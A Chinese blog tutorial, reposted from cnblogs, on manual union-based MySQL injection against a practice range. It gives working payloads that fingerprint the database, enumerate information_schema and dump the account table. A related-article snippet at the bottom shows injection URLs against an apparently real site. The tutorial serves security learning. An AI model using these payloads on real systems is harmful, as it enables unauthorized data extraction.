mysql注入漏洞_WEB 安全学习 一、mysql 注入漏洞

最新推荐文章于 2024-08-09 17:46:44 发布
最新推荐文章于 2024-08-09 17:46:44 发布
阅读量233 收藏
点赞数
文章标签: MySQL information_schema SQL注入 数据库查询 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29009881/article/details/113954044
版权

转载: https://www.cnblogs.com/cui0x01/p/8620524.html

一、Mysql数据库结构

数据库A

表名

列名

数据

数据库B

表名

列名

数据

Mysql5.0以上自带数据库:information_schema

information_schema:存储mysql下所有信息的数据库(数据库名,表名,列名)

参数及解释

database():数据库名

user():数据库用户

version():数据库版本

@@version_compile_os:操作系统

符号“.”代表下一级的意思

information_schema.tables:

information_schema数据库下的tables表名,含义:存储所有数据库下的表名信息的表。

information_schema.columns:

information_schema数据库下的columns表名,含义:存储所有数据库下的列名信息的表。

Table_schema:数据库名

Table_name:表名

Column_name:列名

下面使用手工  对   数字型sqli 注入漏洞进行注入

感谢  米斯特安全 提供的在线靶场

地址  :http://132.232.100.27:88/

输入1  返回正常

输入 1' 返回错误

输入 1+1 返回正常,存在数字型注入漏洞

(也可以使用  1 and 1=1 返回正常)

(1 and 1=2 来进行判断 如果 1=1 返回正常页面  1=2 返回错误页面存在注入漏洞)

SELECT * FROM news WHERE id = 1 and 1=2

SELECT * FROM news WHERE id = 1 and 1=2

9e3d524b628279d8dbe1cc3f34793796.png

49deb28c182fbf79b808f6e3ed55a1f6.png

查询表中的字段数  (也可以使用order by 我这里使用的是union select)

在input 中输入1 union select 1,2,3 返回正常页面

在input 中输入1 union select 1,2,3,4 返回错误页面

说明 该表中有3个字段

SELECT * FROM news WHERE id = 1 union select 1,2,3

下面使用 database(),user(),version() 来替换其中的 1,2,3就可分别看见 数据库中的 数据库名  用户  版本

85e4f7bbe4d1025f24bef309ce812d92.png

查询数据库  -1 union select  1,database(),3

51ee42c2ac411cb7b5aee9595024b72c.png

可以查出数据库的名称就:pentest

group_concat语法:

group_concat([DISTINCT] 要连接的字段 [Order BY ASC/DESC 排序字段] [Separator ‘分隔符’])

查询所有的数据库

-1 union select 1,group_concat(schema_name),3 from information.schemata

注意 改变的时候 不要将 1  替换 ,好像没有查询 字段1,如果替换字段1  是没有反应的

40c7616fed48cde77d5a206d3a64755d.png

可以查出 数据库中 有  information_schema,mysql,pentest,performance_schema  等库

查询出来数据库,那么下一步 我们就查询 pentest 数据库下的数据表

查询  = 数据库名的时候  需要将数据库的名称为16进制编码,提供一个编码转换的地址(https://www.bejson.com/convert/ox2str/)

pentest   =====>    0x70656e74657374

在输入框中输入 -1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 0x70656e74657374

查询结果如下

dcbf22482fa9c1b8cdbb365e8360c85f.png

pentest数据库中 有两个表分别为   account   和  news

下面查询 account表中的列

account转换为 16进制

account ------->>>>  0x6163636f756e74

下一步 查询 account表中的列名

在输入框中输入

-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name =0x6163636f756e74

查询结果如下 : 有三个 字段  Id  rest  own

cc948710cbf5b3a9dd6479b73286881c.png

最后一步,查询表中的数据

-1 union select 1,rest,own from account

最终查询出来的结果为

c0f60c3ed0a428e5de8ad73d2aaf2931.png

月印川
关注
【墨者学院】MySQL数据库手工注入漏洞(详细篇)
weixin_71487689的博客
11-12 930
背景介绍: 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 思路: 掌握SQL注入原理; 了解手工注入的方法; 了解MySQL数据结构; 了解字符串的MD5加解密;
MySQL数据库的SQL注入漏洞解析
CoffeMilk的博客
09-07 1213
SQL注入总结起来就是:没有对用户输入提交的数据内容的合法性进行严格的判断或过滤,就直接将这些伪造的数据内容带入到数据库执行,导致数据泄露或损坏,甚至导致完全接管主机的一种安全漏洞
Mysql SQL注入漏洞
weixin_34060741的博客
06-17 226
学习网址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html      https://www.cnblogs.com/sdya/p/4568548.html 网络安全:网络攻击技术——Broken authentication      网络攻击技术(三)——Denial Of Service      网络攻击技术(二...
MySql注入漏洞
weixin_44906495的博客
04-20 1602
1、简介   1.1、SQL注入的本质   web程序代码中对于用户提交的参数未做过滤就直接放到SQL语句中执行,导致参数中的特殊字符打破了SQL语句原有逻辑,黑客可以利用该漏洞执行任意SQL语句.      1.2、什么是SQL注入   1.是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击   2.这些参数传递给后台的SQL数据库服务器加以解析并执行.      1...
漏洞-MySQL注入
山下南徒的博客
07-10 517
确定使用了MySQL PHP程序一般搭配MySQL http://dynamicfountain.com/page-products-en.php?id=29%27%20and%201=1--+True http://dynamicfountain.com/page-products-en.php?id=29%27%20and%201=1--False 由注释符判定数据库为MySQL。 引发报错信息 page.php?id=' String concatenation(字符串连接) http://dy
浅析 MYSQL数据库SQL 注入漏洞
weixin_44644646的博客
08-09 92
怎么发信sql漏洞
MySQL二次注入漏洞的原理与利用技巧
最新发布
11-04
内容概要:本文介绍了 SQL 二次注入的基本原理和漏洞原因,详细阐述了黑客利用这种漏洞的具体步骤,并通过实例代码分析了漏洞存在的可能性及其利用方法。同时,文章提供了关于注册页面、找回密码页面的部分源码,...
mysql注入扫描网站漏洞工具_基于java的sql注入漏洞扫描工具.pdf
weixin_32058991的博客
02-19 575
基于java的sql注入漏洞扫描工具基于java 的sql 注入漏洞扫描工具目录基于java 的sql 注入漏洞扫描工具 1实验过程 11. 获取一个网站所有的URL 1 期间遇到的一些小问题及解决方法 12. 然后对于获得的URL 进行是否可以进行SQL 注入测试 1 期间遇到的问题 1程序综述 1程序展示 1附录(代码) 1实验过程1. 获取一个网站所有的URL算是实现了...
【小迪安全day13】WEB漏洞——SQL注入MYSQL注入
RichUee的博客
12-05 1388
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
SQL注入漏洞全接触.ppt
11-15
一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取攻击者想得到...
mysql5 注入漏洞
10-30
mysql5注入漏洞代码
SQL注入漏洞Mysql与MSSQL特性)
errorr0
07-01 659
Mysql与MSSQL的特性
SQL注入漏洞mySQL基础
goldfish8848的博客
06-24 910
本文主要介绍数据库相关的基础知识,对之后SQL注入漏洞学习有很大帮助
WEB漏洞-SQL注入MYSQL注入
硫酸超的博客
07-27 505
SQL注入MYSQL注入前言高权限注入及低权限注入跨库查询及应用思路文件读写操作参考资料路径获取常见方法常见读取文件列表常见写入文件问题魔术引号及常见防护低版本注入配合读取或暴力 小于5.0版本 前言 MYSQL注入中首要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击者还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 高权限注入及低权限注入 root在MYSQL数据
mysql注入漏洞语句_SQL注入漏洞过程实例及解决方案
weixin_42307002的博客
01-27 371
代码示例:public class JDBCDemo3 {public static void demo3_1(){boolean flag=login("aaa' OR ' ","1651561"); //若已知用户名,用这种方式便可不用知道密码就可登陆成功if (flag){System.out.println("登陆成功");}else{System.out.println("登陆失败")...
13 WEB漏洞:SQL注入MYSQL注入
qq_52718293的博客
04-29 2129
SQL 是一门 ANSI 的标准计算机语言,用来访问和操作数据库系统-。SQL 语句用于取回和更新数据库中的数据。SQL 可与数据库程序协同工作,比如 MS Access、DB2、Informix、MS SQL Server、Oracle、Sybase 以及其他数据库系统。本来有一些基础知识有在sql注入小总里写,现在还是再提一下: information_schema.tables:记录所有表名信息的表 information_schema.columns:记录所有列名信息的表 table_name:表名
mysql攻防之写入漏洞
weixin_30497527的博客
07-26 189
因为被别人利用mysql攻击,所以想在这里帮助大家提高一下自身mysql安全。避免成为别人的肉鸡。 show global variables like '%secure%'; 如果是这样则黑客可以利用MySQL在系统注入文件。 在linux下这个是不给设置为null的,否则数据库启动不了。 我在这里直接设置成/dev/null 这样即使黑客要注入文件耶没有用。 编辑my.c...
如何利用mysql漏洞进行sql注入_利用SQL注入漏洞登录后台的实现方法
weixin_33817046的博客
02-05 308
一、SQL注入的步骤a) 寻找注入点(如:登录界面、留言板等)b) 用户自己构造SQL语句(如:' or 1=1#,后面会讲解)c) 将sql语句发送给数据库管理系统(DBMS)d) DBMS接收请求,并将该请求解释成机器代码指令,执行必要的存取操作e) DBMS接受返回的结果,并处理,返回给用户因为用户构造了特殊的SQL语句,必定返回特殊的结果(只要你的SQL语句够灵活的话)。下面,我通过一个实...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值